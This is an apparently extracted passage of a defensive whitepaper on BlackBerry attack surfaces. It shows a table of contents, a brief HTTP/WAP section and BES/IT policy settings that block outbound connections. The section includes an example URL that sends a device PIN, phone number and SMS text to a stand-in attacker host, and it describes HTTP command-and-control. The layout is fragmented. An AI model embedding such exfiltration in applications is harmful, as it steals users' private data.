Specifications
Table Of Contents
- Introduction........................................................................................................................................................
- Architecture Overview........................................................................................................................................
- Operating System..............................................................................................................................
- Code Signing...................................................................................................................................................
- Modifying Signed Applications..................................................................................................................
- Malicious Code Signing..............................................................................................................................
- Mitigation Strategies......................................................................................................................................
- BIS Deployment.........................................................................................................................................
- Application Permissions.......................................................................................................................
- Device Firewall....................................................................................................................................
- BES Deployment......................................................................................................................................
- IT Policy...............................................................................................................................................
- Application Control Policy...................................................................................................................
- Application Permissions.....................................................................................................................
- Device Firewall....................................................................................................................................
- Attack Surface Analysis....................................................................................................................................
- Introduction.................................................................................................................................................
- JAD Files.......................................................................................................................................................
- Mitigation................................................................................................................................................
- File System...................................................................................................................................................
- Persistent Storage...................................................................................................................................
- J2ME File System.....................................................................................................................................
- USB Mass Storage....................................................................................................................................
- Mitigation................................................................................................................................................
- Memory and Processes................................................................................................................................
- Auto start-up and Background processes...............................................................................................
- SMS (Short Message Service)......................................................................................................................
- Premium Rate Scam................................................................................................................................
- SMS Interception.....................................................................................................................................
- SMS Backdoor..........................................................................................................................................
- Mitigation................................................................................................................................................
- Bluetooth......................................................................................................................................................
- Bluetooth Backdoor.................................................................................................................................
- Bluetooth Worms.....................................................................................................................................
- Mitigation................................................................................................................................................
- Email.............................................................................................................................................................
- Email Interception...................................................................................................................................
- Backdoor..................................................................................................................................................
- Worm........................................................................................................................................................
- Mitigation................................................................................................................................................
- PIM Data (Personal Information Manager Data).........................................................................................
- Data Theft................................................................................................................................................
- Loss of data availability and integrity.....................................................................................................
- Mitigation................................................................................................................................................
- TCP/IP Connections......................................................................................................................................
- Proxy/Firewall Bypass.............................................................................................................................
- Backdoor..................................................................................................................................................
- Port Scan..................................................................................................................................................
- Mitigation................................................................................................................................................
- Port Scan..................................................................................................................................................
- HTTP / WAP...................................................................................................................................................
- Data Theft................................................................................................................................................
- Backdoor............................................................................................................................................
- HTTP Proxy...............................................................................................................................................
- Mitigation................................................................................................................................................
- Telephony.....................................................................................................................................................
- Call Record Monitoring............................................................................................................................
- Premium Rate Calls.................................................................................................................................
- Bypassing Caller Verification Systems....................................................................................................
- Telephony Data Theft...............................................................................................................................
- Mitigation................................................................................................................................................
- Camera.........................................................................................................................................................
- Mitigation................................................................................................................................................
- Conclusions......................................................................................................................................................
- Appendix A........................................................................................................................................................
- References........................................................................................................................................................
Attack Surface Analysis of BlackBerry Devices
Proxy/Firewall Bypass
Backdoor
Port Scan
HTTP / WAP
The BlackBerry supports HTTP and WAP connections via the J2ME API javax.microedition.io.
5
Unsigned
and signed applications can open a new HTTP connection, and send and receive data using OutputStream
and InputStream objects.
Data Theft
A user installs some apparently useful application or video game. The application steals the user's informa-
tion and the information is passed to the attacker via a HTTP GET request. I.e.:
http://www.badsite.com/upload?&PIN=9012345678&SMS=1&FROM=0865550456&MSG=This+is+top+sec
ret+data
Backdoor
HTTP can also be used as a command and control channel. A malicious application can make an outbound
HTTP connection to retrieve commands from a remote Web site and send back data. E.g.:
28
IT Policy "Allow External Connections" = False
"Allow Internal Connections" = False
Application Controls "External Domains" = [list of allowed domains]
or
"External Network Connections" = Not Permitted
"Internal Network Connections" = Not Permitted
Device Firewall Status = Enabled
Application Permissions Connections > Carrier Internet = Deny
Other Device Settings
IT Policy "Allow External Connections" = False
"Allow Internal Connections" = False
Application Controls "External Network Connections" = Not Permitted
"Internal Network Connections" = Not Permitted
Device Firewall Status = Enabled
Application Permissions Connections > Carrier Internet = Deny
Other Device Settings